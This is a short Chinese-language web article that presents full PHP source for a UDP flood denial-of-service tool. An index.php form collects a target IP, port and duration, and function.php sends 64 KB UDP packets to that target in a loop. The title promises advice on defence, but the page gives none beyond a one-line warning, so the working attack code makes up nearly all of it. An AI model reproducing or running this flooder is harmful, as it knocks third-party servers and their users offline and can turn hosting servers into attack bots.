php DOS攻击实现代码(附如何防范)

2015-01-24信息快讯网

小段php代码实现DOS攻击,有时候通过这段代码不需要获取服务器权限也可以作为攻击的肉鸡了,所以大家一定要注意网站安全

index.php
 
<?php 
$ip = $_SERVER['REMOTE_ADDR']; 
?> 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> 
<html> 
<head> 
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> 
<meta name="author" content=""> 
<title>PHP DoS, Coded by EXE</title> 
</head> 
<!-- PHP DOS, coded by EXE --> 
<style type="text/css"> 
<!-- 
body { 
font-family: Arial, Helvetica, sans-serif; 
font-size: 12px; 
font-style: normal; 
line-height: normal; 
color: #FFFFFF; 
background-color: #000000; 
} 
--> 
</style> 
<!-- PHP DOS, coded by EXE --> 
<body> 
<center><br><br> 
<img src="main.jpg"><br> 
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br> 
<form name="input" action="function.php" method="post"> 
IP: 
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"> 
    Time: 
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"> 
    Port: 
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"> 
<br><br> 
<input type="submit" value=" Start the Attack---> "> 
<br><br> 
<center> 
After initiating the DoS attack, please wait while the browser loads. 
</center> 
</form> 
</center> 
<!-- PHP DOS, coded by EXE --> 
</body> 
</html> 

function.php
 
<?php 
//================================================= 
//PHP DOS v1.8 (Possibly Stronger Flood Strength) 
//Coded by EXE 
//================================================= 
$packets = 0; 
$ip = $_POST['ip']; 
$rand = $_POST['port']; 
set_time_limit(0); 
ignore_user_abort(FALSE); 
$exec_time = $_POST['time']; 
$time = time(); 
print "Flooded: $ip on port $rand <br><br>"; 
$max_time = $time+$exec_time; 
for($i=0;$i<65535;$i++){ 
$out .= "X"; 
} 
while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 
} 
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 
} 
} 
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; 
?> 
©2014-2024 dbsqp.com